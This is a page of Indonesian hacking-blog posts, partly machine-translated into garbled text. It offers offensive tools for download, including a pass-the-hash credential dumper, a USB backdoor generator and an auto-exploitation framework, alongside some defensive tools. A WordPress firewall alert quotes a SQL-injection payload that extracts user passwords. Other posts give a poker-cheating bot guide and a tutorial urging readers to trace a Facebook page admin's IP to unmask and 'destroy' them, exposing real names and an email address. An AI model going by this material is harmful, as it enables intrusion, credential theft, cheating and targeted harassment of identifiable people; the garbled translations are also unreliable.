0 Windows Editor v1.0 - Daftar, Tambah & Edit Sesi Logon

Windows Editor (WCE) memungkinkan untuk daftar sesi logon dan menambah, mengubah, dan menghapus daftar mandat terkait (ex.: LM / NT hash). Ini dapat digunakan, misalnya, untuk melakukan pass-the-hash pada Windows dan juga memperoleh NT / LM hash dari memori (dari login interaktif, layanan, koneksi remote desktop, dll) yang dapat digunakan dalam serangan lebih lanjut.

Platform yang didukung

Mendukung Windows XP, 2003, Vista, 7 dan 2008 (Vista tidak benar-benar diuji, tapi itu harus bekerja).

Pilihan

Kredensial jendela Editor menyediakan opsi berikut:

         -l sesi logon dan kredensial NTLM Daftar (default).
         -s kredensial NTLM Perubahan sesi logon saat ini.
                    Parameter::::.
         -r Daftar logon dan kredensial NTLM sesi tanpa batas.
                    Refresh setiap 5 detik jika sesi baru yang ditemukan.
                    Opsional:-r.
         -c Jalankan di sesi baru dengan mandat yang ditetapkan NTLM.
                    Parameter:.
         Daftar e-logon kredensial NTLM tanpa batas sesi.
                    Refresh setiap kali terjadi peristiwa logon.
         -o menyimpan semua output ke file.
                    Parameter:.
         -i Tentukan LUID bukan sesi menggunakan logon saat ini.
                    Parameter:.
         -d Menghapus kredensial NTLM dari sesi logon.
                    Parameter:.
         -v verbose output.

Anda dapat mendownload Windows v1.0 Kredensial Editor di sini:

wce_v1.0.tgz

Read More »

0 USBsploit 0.3b - Menghasilkan Backdoors Mundur TCP & berbahaya LNK Files.

USBsploit 0.3b – Generate Reverse TCP Backdoors & Malicious .LNK Files

PoC untuk menghasilkan backdoors reverse TCP (x86, x64, semua port), menjalankan Autorun atau USB LNK infeksi, tetapi juga membuang semua file USB jarak jauh pada beberapa sasaran pada waktu yang sama. USBsploit bekerja melalui sesi Meterpreter dengan versi (27MB) cahaya modifikasi dari Metasploit. Antarmuka mod SET (Toolkit Rekayasa Sosial). Script Meterpreter usbsploit.rb Kerangka USBsploit dinyatakan dapat digunakan dengan Metasploit Framework asli.

Anda dapat mendownload USBsploit sini:...

 

 

usbsploit-0.3-BETA-linux-i686.tar.gz

 

Read More »

0 Windows Vista & Windows 7 Bug Kernel Bisa Bypass UAC

Sekarang ini bukan kali pertama Windows UAC telah memukul berita karena cacat, kembali pada bulan Februari 2009 ditemukan bahwa Windows 7 UAC Rentan - Buku Program Modus Bisa Nonaktifkan User Access Control dan setelah itu pada November 2009 itu menunjukkan bahwa Windows 7 UAC (User Access Control) yang tidak efektif Terhadap Malware.
Sebuah nol-hari untuk Windows 7 kembali pada bulan Juli tahun ini juga dilewati Windows UAC.
Sekali lagi hari nol-serius telah memukul Windows, saat ini kerentanan unpatched dalam Kernel. Sejauh ini hanya tampaknya menjadi mengeksploitasi lokal, untuk full hacker dampak buruk akan perlu untuk menggabungkan ini dengan remote nol-hari untuk mendapatkan akses ke mesin dan kemudian meningkatkan izin mereka dan bypass UAC dengan ini.

    Microsoft sedang menyelidiki laporan dari kerentanan unpatched pada kernel Windows yang dapat digunakan oleh penyerang untuk menghindari sistem operasi ukuran keamanan penting.

    Satu perusahaan keamanan dijuluki bug potensi "mimpi buruk," tapi Microsoft meremehkan ancaman tersebut dengan mengingatkan pengguna bahwa hacker akan membutuhkan mengeksploitasi kedua untuk memulai serangan jarak jauh.

    Mengeksploitasi diungkapkan Rabu - hari yang sama bukti-konsep kode go public - dan memungkinkan penyerang memotong User Account Control (UAC) Fitur pada Windows Vista dan Windows 7. UAC, yang sering menyorot ketika Vista debutnya pada tahun 2007, menampilkan petunjuk bahwa pengguna harus membaca dan bereaksi terhadap. Ini dirancang untuk membuat instalasi malware diam mungkin, atau setidaknya lebih sulit.

    "Microsoft menyadari masyarakat posting rincian ketinggian kerentanan keistimewaan yang mungkin berada di kernel Windows," kata Jerry Bryant, seorang manajer grup dengan Microsoft Security Response Center, dalam sebuah e-mail. "Kami akan terus menyelidiki masalah dan, bila dilakukan, kami akan mengambil tindakan yang tepat."

    Bug tersebut dalam file "win32k.sys", bagian dari kernel, dan ada di semua versi Windows, termasuk XP, Vista, Server 2003, Windows 7 dan Server 2008, kata Sophos peneliti Chet Wisniewski dalam posting blog Kamis .
Microsoft menyadari cacat tetapi belum mengeluarkan pernyataan untuk ketika mereka akan patch ini, aku membayangkan mengingat masa lalu mereka yang akan menunggu Patch Selasa depan sebelum mendorong patch keluar. Dan ditambah kenyataan itu bug kernel itu, mungkin diperlukan waktu sedikit lebih untuk memperbaiki.
Perusahaan keamanan tampaknya akan mengambil satu ini cukup serius sebagai kode publik dirilis dikonfirmasi bekerja di beberapa versi Windows.
Ada kesempatan yang sangat kecil bahwa Microsoft mungkin mendorong suatu Out-of-band patch untuk ini, tapi saya merasa tidak mungkin seperti itu bukan kerentanan remote.

Beberapa perusahaan keamanan, termasuk Sophos dan Vupen, telah mengkonfirmasi kerentanan dan melaporkan bahwa kode serangan publik dirilis bekerja pada sistem menjalankan Vista, Windows 7 dan Server 2008.

    Hacker tidak dapat menggunakan memanfaatkan untuk jarak jauh kompromi PC, bagaimanapun, karena membutuhkan akses lokal, fakta bahwa Microsoft menekankan. "Karena ini adalah masalah elevasi-of-hak istimewa lokal, itu membutuhkan penyerang untuk sudah mampu mengeksekusi kode pada mesin yang ditargetkan," kata Bryant.

    "Pada sendiri, bug ini tidak memungkinkan eksekusi kode jauh, tapi tidak mengaktifkan account non-administrator untuk mengeksekusi kode seolah-olah mereka seorang administrator," tambah Wisniewski.

    Meskipun banyak pengguna Windows XP, terutama konsumen dan orang-orang dalam bisnis yang sangat kecil, menjalankan OS melalui account administrator, Microsoft menambahkan UAC untuk Vista dan kemudian sistem operasi sebagai salah satu cara untuk membatasi hak pengguna, dan dengan demikian akses malware ke PC.

    Penyerang harus menggabungkan mengeksploitasi dengan kode berbahaya lainnya yang mengambil keuntungan dari kerentanan lain pada mesin - tidak harus ada di Windows, tetapi dalam aplikasi yang umum terpasang, seperti Adobe Reader, misalnya - untuk membajak PC dan bypass UAC .

    "Mengeksploitasi ini memungkinkan malware yang telah dijatuhkan pada sistem untuk memotong [UAC] dan mendapatkan kontrol penuh dari sistem," kata peneliti Prevx Marco Giuliani di entri pada blog perusahaan keamanan itu Kamis.

    Prevx melaporkan kerentanan ke Microsoft awal pekan ini.
Microsoft telah mengubah cara UAC fungsi sebelum saat itu menunjukkan bahwa hal itu bisa dengan mudah dilewati. Siklus patch berikutnya adalah karena pada Selasa, 14 Desember - yang untungnya tidak terlalu lama. Aku akan mengharapkan patch kernel untuk masalah ini saat itu.

There is more info about the issue here:
Sophos – New Windows zero-day flaw bypasses UAC
Prevx – Windows 0-day exploit: Q&A session

Read More »

0 Proxocket - DLL Proxy Untuk Winsock

Proxocket adalah proxy dll proyek untuk fungsi Winsock utama yang memungkinkan untuk menangkap semua jenis paket dan data yang dikirim / diterima oleh sebuah software tertentu pilihan Anda dan opsional memodifikasi isinya atau menghubungkan, mengikat dan menerima fungsi melalui dll kustom sangat mudah untuk menciptakan.
Proxocket menangani fungsi-fungsi berikut untuk kedua ws2_32.dll dan wsock32.dll:

    WSAStartup,
    soket,
    WSASocketA,
    WSASocketW,
    closesocket,
    menghubungkan,
    WSAConnect,
    mengikat,
    menerima,
    WSAAccept,
    recv,
    recvfrom,
    WSARecv,
    WSARecvFrom,
    WSARecvEx,
    mengirim,
    sendto,
    WSASend,
    & WSASendTo.
Hal ini juga dukungan khusus untuk TCP, UDP, ICMP, IGMP dan paket RAW dengan penanganan SOCK_STREAM, SOCK_DGRAM dan SOCK_RAW pada data baik masuk dan keluar.
Proyek ini dibagi dalam dua bagian:

    pemantauan / mengendus: CAP file dalam format tcpdump akan dihasilkan untuk setiap paket yang diambil, ini adalah operasi standar
    pengguna kustom manipulasi data yang diambil: melalui myproxocket.dll kustom diedit dan dibuat oleh pengguna yang sama adalah mungkin untuk memiliki kendali atas data yang diambil seperti membuat firewall belum sempurna untuk perangkat lunak tertentu atau mengedit data yang akan diteruskan ke menu utama Program on the fly atau membuat decompressor / Decrypter / protocol_analyzer dan seterusnya 

Baca di dalam teks file untuk informasi lebih lanjut dan jika Anda ingin menulis sebuah plugin kita lihat contoh kode sumber tersebut yang myproxocket.c.

Berikut ini adalah beberapa "contoh plugin" penulis menulis untuk proxyfying program utama dan atau melakukan beberapa hal:

     web proxy pompa kecil 0,1: bekerja seperti proxyfier web klasik
     web proxy pompa kecil mode2 0,1: bekerja seperti proxyfier web klasik
     menghubungkan pompa kecil 0,1 Proxy: bekerja seperti proxyfier CONNECT

CATATAN: Jika Anda memiliki Vista dan ws2_32/wsock32 lokal dll adalah tidak dimuat mencoba untuk mengatur kunci registri "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ WindowsNT \ CurrentVersion \ Image File Execution Options \ DevOverrideEnable" ke 1.
CATATAN: fungsi yang diekspor dari myproxocket.dll HARUS dinyatakan sebagai cdecl, ini adalah default pada MinGW tapi tidak pada kompiler lain.
CATATAN: JANGAN menggunakan Cygwin untuk kompilasi plugin myproxocket.

Ada beberapa informasi yang baik tentang bagaimana menggunakan Proxocket sini.

Anda dapat mendownload Proxocket sini:

proxocket.zip

Read More »

0 Serangan Microsoft Surface Analyzer - Uji Kerentanan Software

Serangan Analyzer Permukaan dikembangkan oleh kelompok Teknik Keamanan, membangun kerja tim kami Sains Keamanan. Ini adalah alat yang sama digunakan oleh kelompok-kelompok internal Microsoft katalog produk untuk perubahan yang dibuat ke permukaan sistem operasi serangan oleh instalasi software baru.

Serangan Analyzer Permukaan mengambil snapshot dari sistem negara Anda sebelum dan sesudah instalasi produk (s) dan menampilkan perubahan ke sejumlah elemen kunci dari serangan permukaan Windows.

Hal ini memungkinkan:

     Pengembang untuk melihat perubahan di permukaan serangan yang dihasilkan dari pengenalan kode mereka pada platform Windows
     Profesional TI untuk menilai perubahan Serangan Permukaan agregat dengan instalasi garis organisasi aplikasi bisnis
     Auditor TI Keamanan mengevaluasi risiko bagian tertentu dari perangkat lunak yang diinstal pada platform Windows selama ulasan resiko ancaman
     TI Responders Insiden Keamanan untuk mendapatkan pemahaman yang lebih baik dari keadaan keamanan sistem selama investigasi (jika scan dasar diambil dari sistem selama fase penyebaran)

Persyaratan Sistem

Sistem Operasi yang Didukung: Windows 7; Windows Server 2008; Windows Vista

Pengumpulan data Permukaan Attack: Windows 7, Windows Vista, Windows Server 2008 R1 atau Windows Server 2008 R2

Analisis data Permukaan Attack dan pembuatan laporan:. Windows 7 atau Windows Server 2008 R2 dengan Microsoft Net 3.5 SP1

Anda dapat mendownload Analyzer Serangan Permukaan sini:

64-bit – Attack_Surface_Analyzer_BETA_x64.msi
32-bit – Attack_Surface_Analyzer_BETA_x86.msi


Tested

Read More »

0 Microsoft Enhanced Mitigation Evaluation Toolkit (EMET)

Para Mitigasi ditingkatkan Pengalaman Toolkit (Emet) dirancang untuk membantu mencegah hacker dari mendapatkan akses ke sistem anda.

Perangkat Lunak kerentanan dan eksploitasi telah menjadi bagian kehidupan sehari-hari. Hampir setiap produk harus berurusan dengan mereka dan akibatnya, pengguna dihadapkan dengan aliran update keamanan. Untuk pengguna yang mendapatkan diserang sebelum update terbaru telah diterapkan atau yang mendapatkan diserang sebelum update adalah bahkan tersedia, hasil dapat menghancurkan: malware, kehilangan PII, dll

Keamanan teknologi mitigasi dirancang untuk membuat lebih sulit bagi penyerang untuk mengeksploitasi kelemahan di bagian tertentu dari perangkat lunak. Emet memungkinkan pengguna untuk mengelola teknologi tersebut pada sistem mereka dan memberikan beberapa manfaat yang unik:

1. Tidak ada kode sumber yang diperlukan: Sampai sekarang, beberapa mitigasi tersedia (seperti Pencegahan Eksekusi Data) telah diperlukan untuk aplikasi yang akan disertakan dalam manual dan dikompilasi ulang. Emet perubahan ini dengan memungkinkan pengguna untuk memilih aplikasi tanpa kompilasi ulang. Hal ini terutama berguna untuk menyebarkan mitigasi pada perangkat lunak yang ditulis sebelum mitigasi yang tersedia dan ketika kode sumber tidak tersedia.

2. Sangat dapat dikonfigurasi: Emet menyediakan tingkat yang lebih tinggi dengan memungkinkan granularity mitigasi secara individual diterapkan secara proses per. Tidak perlu untuk mengaktifkan seluruh produk atau suite aplikasi. Hal ini bermanfaat dalam situasi di mana proses yang tidak kompatibel dengan teknologi mitigasi tertentu. Ketika itu terjadi, pengguna hanya dapat mengubah mitigasi yang off untuk proses tersebut.

3. Membantu mengeras aplikasi legacy: Ini tidak biasa untuk memiliki ketergantungan keras pada perangkat lunak warisan lama yang tidak dapat dengan mudah ditulis ulang dan perlu dihapus perlahan-lahan. Sayangnya, ini dapat dengan mudah menimbulkan risiko keamanan sebagai perangkat lunak warisan terkenal karena memiliki kerentanan keamanan. Sementara solusi nyata untuk ini adalah bermigrasi jauh dari perangkat lunak warisan, Emet dapat membantu mengelola risiko saat ini terjadi dengan membuatnya lebih sulit untuk hacker untuk mengeksploitasi kerentanan dalam perangkat lunak warisan.

4. Kemudahan penggunaan: Kebijakan untuk sistem mitigasi lebar dapat dilihat dan dikonfigurasi dengan antarmuka pengguna grafis Emet itu. Tidak perlu untuk menemukan dan menguraikan kunci registri atau menjalankan utilitas tergantung platform. Dengan Emet Anda dapat menyesuaikan pengaturan dengan interface yang konsisten terlepas dari platform yang mendasari.

5. Perbaikan yang sedang berlangsung: Emet adalah alat yang hidup dirancang untuk menjadi diperbarui sebagai teknologi mitigasi baru menjadi tersedia. Ini memberikan kesempatan bagi pengguna untuk mencoba dan mendapatkan keuntungan dari pemotongan tepi mitigasi. Siklus rilis untuk Emet juga tidak terikat dengan produk apapun. Update Emet dapat dibuat secara dinamis secepat mitigasi baru siap

Toolkit ini mencakup beberapa teknologi mitigasi yang bertujuan mengganggu semu teknik mengeksploitasi saat ini. Ini mitigasi palsu tidak cukup kuat untuk menghentikan teknik mengeksploitasi masa depan, tetapi dapat membantu mencegah pengguna dari yang dikompromikan oleh banyak eksploitasi yang sedang digunakan. Para mitigasi juga dirancang sehingga mereka dapat dengan mudah diperbarui sebagai penyerang mulai menggunakan teknik mengeksploitasi baru.

Anda dapat mendownload Emet v2.1 di sini:
EMET Setup.msi

Read More »

0 WinAutopwn v2.7 Released – Windows Auto Hacking Tool

Saya selalu skeptis tentang alat ini, terutama terlihat seolah-olah versi pertama dirilis pada hari April Mop tahun 2009, toh itu 2 tahun kemudian sekarang dan masih tampaknya menjadi sekitar jadi saya pikir pantas menerbitkan pembaruan.

Jika ada dari Anda telah benar-benar diuji alat ini keluar, melakukan drop komentar di bawah ini.

winAUTOPWN dan bsdAUTOPWN adalah Kerangka Interaktif minimal yang bertindak sebagai frontend untuk eksploitasi kerentanan sistem cepat. Dibutuhkan input seperti alamat IP, Hostname, Jalan CMS, dll dan melakukan portscan multi-threaded cerdas untuk port TCP 1-65535. Eksploitasi mampu memberikan Kerang Jauh, yang dipublikasikan untuk umum melalui Internet dengan kontributor aktif dan penulis mengeksploitasi terus ditambahkan ke winAUTOPWN / bsdAUTOPWN. Banyak dari eksploitasi yang ditulis dalam bahasa scripting seperti python, perl dan php. Kehadiran juru bahasa sangat penting untuk eksploitasi yang berhasil menggunakan winAUTOPWN / bsdAUTOPWN.

Eksploitasi ditulis dalam bahasa seperti C, Delphi, ASM yang dapat dikompilasi adalah pra-dikumpulkan dan ditambahkan bersama-dengan orang lain. Pada eksploitasi sukses winAUTOPWN / bsdAUTOPWN memberikan remote shell dan menunggu penyerang untuk menggunakan shell sebelum mencoba eksploitasi lainnya. Dengan cara ini penyerang dapat menghitung dan memeriksa jumlah eksploitasi yang sebenarnya bekerja pada Sistem Sasaran.

Baru di v2.7

Versi ini mencakup hampir semua eksploitasi jarak jauh sampai-sampai pertengahan Juli 2011 dan beberapa yang lebih tua juga. Versi ini menggabungkan beberapa parameter commandline baru:-perlrevshURL (untuk URL Shell PERL Reverse), - mailFROM (smtpsender) dan-mailto (smtpreceiver). Ini adalah argumen commandline diperlukan untuk beberapa eksploitasi yang memerlukan jarak jauh terhubung kembali menggunakan shell perl dan server email eksploitasi membutuhkan otentikasi masing-masing. Versi ini juga menangani berbagai bug dan perbaikan internal yang mereka.


Sebuah daftar lengkap dari semua Eksploitasi di winAUTOPWN tersedia di CHANGELOG.TXT
Daftar lengkap perubahan User Interface tersedia dalam UI_CHANGES.txt

Juga, dalam versi ini:

     BSDAUTOPWN telah diupgrade ke versi 1.5.
     Dalam rilis ini Anda juga akan menemukan binari pre-compiled untuk:
     FreeBSD x86
     FreeBSD x64
     Dragonfly BSD x86

Anda dapat mendownload winAUTOPWN v2.7 di sini:

winAUTOPWN_2.7.RAR

Read More »

0 Network Miner v1.1 Released – Windows Packet Analyzer & Sniffer

NetworkMiner adalah Alat Analisis Jaringan Forensik (NFAT) untuk Windows. NetworkMiner dapat digunakan sebagai alat sniffer / paket jaringan pasif menangkap dalam rangka untuk mendeteksi sistem operasi, sesi, nama host, buka port dll tanpa meletakkan lalu lintas pada jaringan. NetworkMiner juga dapat mengurai file pcap untuk off-line analisis dan untuk regenerasi / memasang kembali file ditransmisikan dan sertifikat dari file pcap.

NetworkMiner mengumpulkan data (seperti bukti 

forensik) tentang host pada jaringan daripada untuk mengumpulkan data mengenai lalu lintas pada jaringan. Tampilan antarmuka pengguna utama adalah tuan rumah sentris (informasi dikelompokkan per host) daripada sentris paket (informasi menunjukkan sebagai daftar paket / frame).

NetworkMiner, sejak rilis pertama tahun 2007, menjadi alat populer di kalangan tim respon insiden serta penegakan hukum. NetworkMiner saat ini digunakan oleh perusahaan dan organisasi di seluruh dunia.

The new version supports features such as:

• Extraction of Google Analytics data
• Better parsing of SMB data
• Support for PPP frames
• Even more stable than the 1.0 release

You can download NetworkMiner v1.1 here:
NetworkMiner_1-1.zip

Read More »

0 Mengembalikan Account Facebook Yang Dibobol

Account facebook dibobol? Nggak kebayang gimana rasanya. Sebel, sedih, marah dll campur aduk di dalam kepala. Apalagi kalo info dan wtw(wall to wall) dibalas oleh orang jail dengan kata-kata yang nggak enak dilihat. Terus kemudian kita jadi Tanya kesana kemari hanya untuk mencari orang yang bisa mengembalikan facebook kita atau sekedar tau cara dan mau berbagi kepada kita.

Oke, langsung saja sebelum itu dalam artikel ini ada beberapa persyaratan yang perlu diperhatikan yaitu account e-mail Anda tidak dibobol. Walaupun e-mail login facebook Anda sudah diganti oleh orang jail dan e-mail login Anda tersebut dihapus oleh orang jail tersebut, Anda tetap bisa mengembalikan account facebook Anda yang telah dibobol.


Pertama-tama ada skenario berikut ini.


Ardi Nursyasmu (nama disamarkan untuk kepentingan privasi :P) merupakan seorang yang sukses dan memiliki masa depan cerah karena baru saja diterima bekerja di Microsoft Corp. Dia juga terkenal pandai karena dia sekolah di Sussex, kemudian melanjutkan ke Harvard University untuk kuliah dan lulus dengan predikat cumlaude. Untuk membanggakan hasil kerja keras dan keberuntungannya, dia membuat sebuah account facebook dengan e-mail korbanmalpraktek@yahoo.com. Dan setelah berkutat di depan computer selama 2 jam, akhirnya terbentuklah profil seperti dibawah ini(maaf, Ardi Nursyamsu belum bisa mengupload foto :P).





Karena belum pernah tau tentang strong password, dia menggunakan tanggal lahirnya sebagai password dengan pikiran bahwa tidak aka nada yang peduli dengan ulang tahunya(kasiahan amat si Ardi).


rdiearth yang mengaku sebagai hacker elite(padahal newbie aja belum :P), dengan teknik yang sok rumit mencoba mendapatkan username dan password Ardi dan akhirnya berhasil. Kemudian dia login sebagai Ardi Nursyamsu.





Dasar rdiearth orangnya iseng, dia mengubah-ubah informasi di tab info Ardi sehingga jadi seperti ini.





Untuk keamanan, agar facebook yang dia bobol tidak di bobol oleh orang iseng lainnya, maka rdiearth merubah settingan username dan password Ardi dan beginilah tampilannya.





Akhirnya setelah puas, rdiearth logout dari account Ardi untuk kemudian login ke facebooknya sendiri (Saya rasa ini tidak perlu dibahas).
Ardi yang penasaran sudah berapa friend request yang diterimanya, mencoba login ke facbooknya. Namun sayang dia gagal :0.





Ardi merasa sebal. Dia mencoba berulang kali login ke accountnya tapi selalu gagal. Akhirnya dia mendapat pesan dari langit. “Hai Ardi, cobalah buka e-mail accountmu.” Ardi sempat bingung, namun akhirnya dia membuka e-mailnya. Wah, ada notification dari facebook kalau ada seseorang yang merubah username di passwordnya. Lalu dia mengeklik link untuk membatalkan perubahan tersebut.





Kemudian, muncul halaman dari facebook dibawah ini.


Ardi meng-klik tobol “Konfirmasi Permintaan” dan mengikuti instruksi selanjutnya.





Akhirnya facebook Ardi berhasil dikembalikan dan ketika rdiearth ingin melihat facebook jarahannya keesokan harinya, dia merasa gondok karena ternyata Ardi lebih pintar darinya(atau mungkin lebih beruntung :P).





Pada dasarnya cara tersebut secara implisit sudah disediakan oleh facebook, hanya saja mungkin banyak orang belum mengetahuinya(semoga Saya salah ).


Akhir kalimat, semoga artikel ini bermanfaat dan seperti biasa Saya sangat mengharapkan kritik dan saran Anda agar tulisan-tulisan Saya ini akan lebih berkembang kedepannya.

Read More »

0 Plugin Wordpress Firewall

sobat gempar69 Plugin ini cukup bagus untuk mengetahui jika ada yang coba-coba melakukan serangan seperti SQL injection dll terhadap blog Anda. Baru saja saya buka email, dan ternyata ada laporan atas penyerangan yang dilakukan seseorang di blog saya ini..

Saya juga ga tau tujuanya apa, paling hanya orang iseng.. :alay dan penyerangan itu dilakukan sekitar pukul 13:00 tanggal 28 hari senin dengan IP 94.246.126.213
Ini contoh pesan yang saya dapatkan, kurang lebih seperti ini:



WordPress Firewall has detected and blocked a potential attack!

Web Page: bh0ttu.com/wp-content/plugins/wp-forum/forum_feed.php?thread=-2+union+select+1,2,3,concat(user_login,0x2f,user_p ass,0x2f,user_email),5,6,7+from+wp_users/*

Warning : URL may contain dangerous content!
Offending IP : 94.246.126.213 [ Get IP location ]
Offending Parameter: thread = -2 union select 1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_e mail),5,6,7 from wp_users/*

This may be a "SQL Injection Attack."

Click here for more information on this type of attack.

If you suspect this may be a false alarm because of something you recently did, try to confirm by repeating those actions. If so, whitelist it via the "whitelist this variable" link below. This will prevent future false alarms.

Click here to whitelist this variable.
Click here to turn off these emails



Makanya langsung saya share deh plugin yang satu ini, siapa tau bisa bermanfaat buat Anda juga.. Plugin ini dapat merekam/mencatat even-even mencurigakan serta memberitahu administrator terhadap segala usaha-usaha untuk menembus website Anda.

Cara penggunanya seperti biasa, upload ke folder plugin, bisa juga upload lewat dashboard, atau langsung di cpanel..
Kalau sudah, login ke cpanel dan masuk ke wp-content --> plugin --> buat folder dengan nama wp-firewall kemudian buat file bernama wordpress-firewall.php dan masukan script ini http://bh0ttu.com/txt/wordpress-firewall.txt
Setelah itu masuk ke dashboard dan aktifkan plugin ini..

Semoga bermanfaat..

Read More »

2 Cara Terbaru Menggunakan Botfb (Bot Poker Facebook)

Sobat gempar69 Sebelumnya ane pernah share tentang cara menggunakan zynga bot poker, di HACKER LIAR. cara yang ane tulis tersebut masih dikeluhkan oleh beberapa pembaca karena dirasa kurang lengkap dan kurang detail. Nah pada kesempatan kali ini ane janji akan membuat postingan sedetail-detailnya. Oke kita mulai yah. Jangan lupa siapkan Secangkir Kopi karena saat menggunakan Bot Poker ini gan hanya akan menonton terus dan membiarkan botfb bekerja sendiri untuk gan.

• Yang pertama yang harus gan lakukan adalah download botfb.rar disini.
  
• Update : Coba bot terbaru 2010 download disini
• Join ke Meja 9 Player dan harus ada kursi kosong minimal 1.
• Jangan duduk di kursi tersebut.
• Jalankan Bootage.exe
• Gan akan diminta memasukkan angka bigblind (yang sering main GOP pasti tau BigBlind itu apa) Bigblind adalah angka taruhan wajib untuk ikut main atau tidak saat kartu belum turun.

• Klik Save
• Jika ada kursi kosong, maka botfb akan segera duduk disana tanpa gan gerakkan, gan tinggal menonton, semua terjadi secara otomatis

• Gambar diatas saya ambil saat BotFb mulai berjalan secara Otomatis.
• Biasanya terdapat kata Warning No empty seat found,.... abaikan saja
• Dibagian dealaer Chat seperti gambar diatas adalah statistik dimeja kita. Players adalah jumlah player yang ikut bukan jumlah player yang duduk disana.
• Ingatlah untuk tidak pernah meninggalkan jendela Texas Holdem Poker. Saat gan melakukannya BotFb tidak akan berjalan sebagaimana mestinya. Jadi siapkan Kopi untuk menonton botfb yang lagi main.
• Bot Fb dapat mengetahui semua kartu yang akan muncul didalam permainan. Jadi jangan kaget jika ia sering Fold.

NB: Silakan Download poker zynga ver 7.7
Download Zynga-poker-bot Semoga bisa membantu.. Mohon Maaf klo ane ada yg salah....

Akhir kata, selamat mencoba sobat. Jangan lupa tinggalkan jejakmu di komentar.

Read More »

0 Melacak IP Addres Teman Di Facebook & Hancurkan Page Ini

Pada artikel ini, saya akan beritahukan bagaimana langkah awal kita untuk melakukan hack terhadap facebook ini :

http://www.facebook.com/pages/Everyb...23607727664016

di dalam status yang baru-baru ini, page ini menyinggung mengenai IP Addres. Apa itu IP Addres? Penjelasan sederhana IP Addres adalah pengalamatan komputer kita berdasarkan range-range tertentu. Saya ibaratkan bahwa, jika setiap Handphone memiliki nomer telepon yang bisa dihubungi... Maka untuk Komputer, IP Addres ini memiliki fungsi yang sama dengan nomer telepon itu. Kita bisa melacak, lokasi dengan tepat dimana pemilik IP Addres tersebut . ..

Dan jika sudah mampu mengidentifikasi IP Addres nya, langkah yang paling penting adalah melakukan "tracert, tracking, dan fingerprinting tentang aktifitas nya di dunia maya. Lalu, kita bisa mengidentifikasi siapa pelaku atau admin page ini . .. lol

berikut screenshot nya:



Oke, terlihat kan . .. apa itu IP addres ,. Page ini sungguh membuat saya marah ,.

Oke, saya akan memberikan contoh. Bagaimana seorang hacker mampu melacak IP Addres pengguna fb ( sebetulnya rahasia perusahaan, tapi untuk kita . .. mari hancurkan ini bersama , jika anda punya cukup banyak nyali )

saya akan memberikan contoh. Tapi saya sebelumnya minta maaf. karena menggunakan akun email lutfi. Just For Educational Purposes Only , ^_^v peace . ..

pertama,
saya memanfaatkan email notifikasi yang masuk melalui facebook. misalnya saya ambil notifikasi email dari Reni Agustiani.




di dalam warna kuning, telah saya kasih tanda. kita lihat header lengkapnya . .. maka akan muncul seperti ini :



dan ini hasil lengkapnya:

-----------------------+(( Header Email ))+-----------------------

From Facebook Thu Sep 10 16:17:22 2009
X-Apparently-To: faujiridwan@yahoo.co.id via 124.108.123.158; Fri, 11 Sep 2009 00:17:27 +0800
Return-Path: <notification+y46j=of9@facebookmail.com>
X-YMailISG: l6rUGAkWLDsTMdj3IrahH_sZy1.wTzilIVJvClGVtSZrcmfUfl GIpyEYMD2OyA7iI6mRZvk.9QEmQflPufviZvzvbs5c36R75QGY A9CR6ouMQv.OV.Q7diD78R6cM6xCbIYZRH4PUhreHBF8DkIiXH aEj6nCHI.Qx.53eOTtQwS3uBGbVYqFX2wd2WNV9tEV6TWmQi9A AOt_uAQqgYkHT3Ul5B_Ha6qLvbiydH_LXDtD3thCZm8BXn_Ci8 N9CVRGTlcY_3VW0HdX2Ih7fIReL2OcrLFQsaSDQukwB5j2SNC. uQPk3i7UZHgWD9c6CsLonQ--
X-Originating-IP: [69.63.178.175]
Authentication-Results: mta124.mail.sg1.yahoo.com from=facebookmail.com; domainkeys=neutral (no sig); from=facebookmail.com; dkim=pass (ok)
Received: from 69.63.178.175 (EHLO mx-out.facebook.com) (69.63.178.175)
by mta124.mail.sg1.yahoo.com with SMTP; Fri, 11 Sep 2009 00:17:27 +0800
Return-Path: <notification+y46j=of9@facebookmail.com>
DKIM-Signature: v=1; a=rsa-sha1; d=facebookmail.com; s=q1-2009b; c=relaxed/relaxed;
q=dns/txt; i=@facebookmail.com; t=1252599442;
h=From:Subjectate:To:MIME-Version:Content-Type;
bh=ni9Q2ZQv/gbM3B3oiSOmnjRj8Y8=;
b=pqkJ5IBS1A+7H6hMQ/FV61z/6NAu4skBifEKKBH1gmuY/YraNlXNbi9MnIIBCSxl
sZrp9gue3eL2DdbLiYIzmQ==;
Received: from [10.18.255.176] ([10.18.255.176:34214])
by mta006.snc1.facebook.com (envelope-from <notification+y46j=of9@facebookmail.com>)
(ecelerity 2.2.2.37 r(28805/28844)) with ECSTREAM
id 79/67-17407-29629AA4; Thu, 10 Sep 2009 09:17:22 -0700
X-Facebook: from zuckmail ([MTI1LjE2MS4xNzguOTI=])
by www.facebook.com with HTTP (ZuckMail);
Date: Thu, 10 Sep 2009 09:17:22 -0700
To: Lutfi Fauji Ridwan <faujiridwan@yahoo.co.id>
From: Facebook <notification+y46j=of9@facebookmail.com>
Reply-to: noreply <noreply@facebookmail.com>
Subject: Reni Agustiani tagged a photo of you on Facebook
Message-ID: <a784d75cf8ad9f744959d2d2bc621128@www.facebook.c om >
X-Priority: 3
X-Mailer: ZuckMail [version 1.00]
X-Facebook-Notify: photo_tag; from=1286103888; uid=1286103888; pid=30382928; api_pid=5523774138248829776; mailid=11323c0G5451ffb4G5de5d5G5
Errors-To: notification+y46j=of9@facebookmail.com
X-FACEBOOK-PRIORITY: 0
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="UTF-8"
Content-Length: 810

-----------------------+(( E.N.D ))+-----------------------
yang kita butuhkan adalah bugs dari facebook dalam bentuk kode enkripsi base64 di dalam header tersebut.
------------------------------------------------------------------
X-Facebook: from zuckmail ([MTI1LjE2MS4xNzguOTI=])
by www.facebook.com with HTTP (ZuckMail);
-------------------------------------------------------------------
yang kita butuhkan adalah kode ini saja: MTI1LjE2MS4xNzguOTI=

itu adalah kode enkripsi base64 . Pertanyaannya, darimana saya tahu itu terenkoding? di akhir header ada code:
------------------------------------------------------------------
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="UTF-8"
Content-Length: 810
------------------------------------------------------------------
so, kalo dah dapet kodenya . .. lalu kita decode ( diterjemahkan encoding base64 tadi ). Kalo saya lebih suka Online ke web ini:

http://www.opinionatedgeek.com/dotne...e/Default.aspx

